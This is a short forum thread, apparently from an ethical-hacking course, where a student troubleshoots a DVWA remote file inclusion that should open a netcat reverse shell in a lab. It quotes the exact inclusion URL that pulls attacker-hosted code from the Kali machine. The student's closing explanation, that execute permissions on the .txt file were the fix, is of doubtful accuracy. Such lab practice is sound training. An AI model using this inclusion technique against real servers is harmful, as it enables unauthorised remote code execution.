Viewing 6 posts - 1 through 6 (of 6 total)
  • Author
    Posts
  • #35452
    AvatarTom Harrow
    Participant

    When I execute the URL to establish the reverse connection, no connection is made by netcat. DVWA is set to “low. I receive these two messages right below the URL bar:
    “Warning: include(http:/10.0.2.6/reverse.txt) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/vulnerabilities/fi/index.php on line 35.
    Warning: include() [function.include]: Failed opening ‘http:/10.0.2.6/reverse.txt’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear:../../external/phpids/0.6/lib/’) in /var/www/dvwa/vulnerabilities/fi/index.php on line 35”.
    This is similar to errors I got with local file inclusion.

    Both Kali and Metasploitable are set to NatNetwork; Kali apache2 server is running. Phpini file edited to allow_url On. Thanks is advance.

    #35492

    Can you paste the exact url used there?

    #35576
    AvatarTom Harrow
    Participant

    Vashisht,

    This is the exact URL I used – http://10.0.2.7/dvwa/vulnerabilities/fi/?page=http:/10.0.2.6/reverse.txt

    kali machine is on 10.0.2.6, with apach2 server started. dvwa is on 10.0.2.7. reverse.txt file is in /var/www/html directory. Dvwa set to “low” security. Thanks in advance for your help. Have not had any luck finding the solution searching the web.

    #35601

    Can you try clearing the browsing history for the kali machine?

    #35638
    AvatarTom Harrow
    Participant

    That didn’t work, so I got to thinking about the php file. Since it had an extension of .txt, it probably couldn’t be executed without adding execution permissions. I did that and now it works. Thanks,

    Tom

    #35708
    AvatarZaid Sabih
    Moderator

    Perfect, glad you figured it out 🙂

Viewing 6 posts - 1 through 6 (of 6 total)
  • You must be logged in to reply to this topic.